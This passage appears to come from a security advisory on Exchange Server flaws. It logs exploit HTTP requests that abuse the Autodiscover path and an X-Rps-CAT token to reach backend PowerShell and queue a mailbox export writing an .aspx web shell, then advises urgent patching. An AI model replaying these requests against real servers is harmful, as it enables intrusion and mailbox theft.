xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/CommandResponse</a:Action><a:MessageID>uuid:3EDF3334-08DD-457B-B720-8BB44441B0B2</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:D8752694-77F1-42EA-B7F0-45EA48ABF82D</a:RelatesTo></s:Header><s:Body><rsp:CommandResponse><rsp:CommandId>4798AE77-8B43-43DD-AE37-7ECAFFF79A45</rsp:CommandId></rsp:CommandResponse></s:Body></s:Envelope>
####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: none
Accept: */*
Cache-Control: no-cache
Connection: keep-alive
Content-Type: application/soap+xml;charset=UTF-8
Content-Length: 1814

<?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:DD7F4182-5BDD-4583-95B7-6ADA6915A0AE</a:MessageID><p:SessionId mustUnderstand="false">uuid:EF0F132A-2BBC-4280-9360-F02860D911E9</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action><w:OptionSet><w:Option Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">TRUE</w:Option></w:OptionSet><w:SelectorSet><w:Selector Name="ShellId">A45206E8-5119-4982-BEF9-9F2F7C0121B0</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Receive><rsp:DesiredStream CommandId="4798AE77-8B43-43DD-AE37-7ECAFFF79A45">stdout</rsp:DesiredStream></rsp:Receive></env:Body></env:Envelope>
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/soap+xml;charset=UTF-8
Server: Microsoft-IIS/10.0
request-id: dc68c921-f1c4-4f05-bafb-f9fb013f150b
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:45 GMT; path=/Autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:44 GMT
Content-Length: 2921

<s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/ReceiveResponse</a:Action><a:MessageID>uuid:EB58C5D7-C871-43AB-922D-AC8B1410573C</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:DD7F4182-5BDD-4583-95B7-6ADA6915A0AE</a:RelatesTo></s:Header><s:Body><rsp:ReceiveResponse><rsp:Stream Name="stdout" CommandId="4798AE77-8B43-43DD-AE37-7ECAFFF79A45">AAAAAAAAAVMAAAAAAAAAAAMAAATEAQAAAAQQBACRcqtkrXe/ToZ0tBT/b01Od66YR0OL3UOuN37K//eaRe+7vzxPYmogUmVmSWQ9IjAiPjxUTiBSZWZJZD0iMCI+PFQ+TWljcm9zb2Z0LkV4Y2hhbmdlLk1haWxib3hSZXBsaWNhdGlvblNlcnZpY2UuTWFpbGJveEV4cG9ydFJlcXVlc3Q8L1Q+PFQ+TWljcm9zb2Z0LkV4Y2hhbmdlLk1haWxib3hSZXBsaWNhdGlvblNlcnZpY2UuUmVxdWVzdEJhc2U8L1Q+PFQ+TWljcm9zb2Z0LkV4Y2hhbmdlLkRhdGEuQ29uZmlndXJhYmxlT2JqZWN0PC9UPjxUPlN5c3RlbS5PYmplY3Q8L1Q+PC9UTj48VG9TdHJpbmc+ZXhjaGcubGFuL1VzZXJzL3NtY2ludHlyZVxMUDBobHI3ZXRwNFo8L1RvU3RyaW5nPjxQcm9wcz48UyBOPSJGaWxlUGF0aCI+XFx3aW4tYnBpZDk1YWNxN2UuZXhjaGcubGFuXEMkXFByb2dyYW0gRmlsZXNcTWljcm9zb2Z0XEV4Y2hhbmdlIFNlcnZlclxWMTVcRnJvbnRFbmRcSHR0cFByb3h5XG93YVxhdXRoXDlDVEVvc3dUMi5hc3B4PC9TPjxTIE49Ik1haWxib3giPmV4Y2hnLmxhbi9Vc2Vycy9zbWNpbnR5cmU8L1M+PFMgTj0iTmFtZSI+TFAwaGxyN2V0cDRaPC9TPjxHIE49IlJlcXVlc3RHdWlkIj4yOGZhZTExZC1hZmQ0LTRmYWYtOTBjMS02MWQzNTQyYjc4MWE8L0c+PFMgTj0iUmVxdWVzdFF1ZXVlIj5NYWlsYm94IERhdGFiYXNlIDAyNjI5NDEzODU8L1M+PFMgTj0iRmxhZ3MiPkludHJhT3JnLCBQdXNoPC9TPjxOaWwgTj0iQmF0Y2hOYW1lIiAvPjxTIE49IlN0YXR1cyI+UXVldWVkPC9TPjxCIE49IlByb3RlY3QiPmZhbHNlPC9CPjxCIE49IlN1c3BlbmQiPmZhbHNlPC9CPjxTIE49IkRpcmVjdGlvbiI+UHVzaDwvUz48UyBOPSJSZXF1ZXN0U3R5bGUiPkludHJhT3JnPC9TPjxTIE49Ik9yZ2FuaXphdGlvbklkIj48L1M+PERUIE49IldoZW5DaGFuZ2VkIj4yMDIxLTA4LTE4VDE1OjE0OjQ1LjIxNDQ2OC0wNDowMDwvRFQ+PERUIE49IldoZW5DcmVhdGVkIj4yMDIxLTA4LTE4VDE1OjE0OjQ1LjIwNjQ4NjItMDQ6MDA8L0RUPjxEVCBOPSJXaGVuQ2hhbmdlZFVUQyI+MjAyMS0wOC0xOFQxOToxNDo0NS4yMTQ0NjhaPC9EVD48RFQgTj0iV2hlbkNyZWF0ZWRVVEMiPjIwMjEtMDgtMThUMTk6MTQ6NDUuMjA2NDg2Mlo8L0RUPjxTIE49IklkZW50aXR5Ij5leGNoZy5sYW4vVXNlcnMvc21jaW50eXJlXExQMGhscjdldHA0WjwvUz48QiBOPSJJc1ZhbGlkIj50cnVlPC9CPjxTIE49Ik9iamVjdFN0YXRlIj5OZXc8L1M+PC9Qcm9wcz48L09iaj4=</rsp:Stream><rsp:Stream Name="stdout" CommandId="4798AE77-8B43-43DD-AE37-7ECAFFF79A45">AAAAAAAAAVQAAAAAAAAAAAMAAABnAQAAAAYQBACRcqtkrXe/ToZ0tBT/b01Od66YR0OL3UOuN37K//eaRe+7vzxPYmogUmVmSWQ9IjAiPjxNUz48STMyIE49IlBpcGVsaW5lU3RhdGUiPjQ8L0kzMj48L01TPjwvT2JqPg==</rsp:Stream><rsp:CommandState CommandId="4798AE77-8B43-43DD-AE37-7ECAFFF79A45" State="http://schemas.microsoft.com/wbem/wsman/1/windows/shell/CommandState/Done"><rsp:ExitCode>0</rsp:ExitCode></rsp:CommandState></rsp:ReceiveResponse></s:Body></s:Envelope>
####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: none
Accept: */*
Cache-Control: no-cache
Connection: keep-alive
Content-Type: application/soap+xml;charset=UTF-8
Content-Length: 1768

<?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:13F33900-1D92-4CB3-B1C2-DCCC22698A1A</a:MessageID><p:SessionId mustUnderstand="false">uuid:EF0F132A-2BBC-4280-9360-F02860D911E9</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Signal</a:Action><w:SelectorSet><w:Selector Name="ShellId">A45206E8-5119-4982-BEF9-9F2F7C0121B0</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Signal CommandId="4798AE77-8B43-43DD-AE37-7ECAFFF79A45"><rsp:Code>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/signal/terminate</rsp:Code></rsp:Signal></env:Body></env:Envelope>
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/soap+xml;charset=UTF-8
Server: Microsoft-IIS/10.0
request-id: 885f91aa-4169-4c5a-91f0-d97f20a9f028
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:45 GMT; path=/Autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:45 GMT
Content-Length: 757

<s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/SignalResponse</a:Action><a:MessageID>uuid:F14BCB86-2E12-45E2-95F7-4B585866A238</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:13F33900-1D92-4CB3-B1C2-DCCC22698A1A</a:RelatesTo></s:Header><s:Body><rsp:SignalResponse/></s:Body></s:Envelope>
####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: none
Accept: */*
Cache-Control: no-cache
Connection: keep-alive
Content-Type: application/soap+xml;charset=UTF-8
Content-Length: 1592

<?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:BFA919EE-7BD0-47EB-B245-21E9A3007065</a:MessageID><p:SessionId mustUnderstand="false">uuid:EF0F132A-2BBC-4280-9360-F02860D911E9</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Delete</a:Action><w:SelectorSet><w:Selector Name="ShellId">A45206E8-5119-4982-BEF9-9F2F7C0121B0</w:Selector></w:SelectorSet></env:Header><env:Body></env:Body></env:Envelope>
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/soap+xml;charset=UTF-8
Server: Microsoft-IIS/10.0
request-id: 984b942a-c6fa-478e-863f-edca7f281c1b
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:45 GMT; path=/Autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:45 GMT
Content-Length: 602

<s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.xmlsoap.org/ws/2004/09/transfer/DeleteResponse</a:Action><a:MessageID>uuid:DBA1754E-0BA9-40B6-BB47-EFA7B6C5FBAB</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:BFA919EE-7BD0-47EB-B245-21E9A3007065</a:RelatesTo></s:Header><s:Body></s:Body></s:Envelope>

Guidance

Organizations that have not patched these vulnerabilities should do so on an emergency basis and invoke incident response protocols to look for indicators of compromise. Organizations that rely on on-premises installations of Exchange Server and are not able to move to O365 should ensure that future Exchange vulnerabilities can be patched on a zero-day (emergency) basis wherever possible. Note that this requires keeping current with quarterly Cumulative Updates, since Microsoft only releases security fixes for the most recent Cumulative Update versions.

References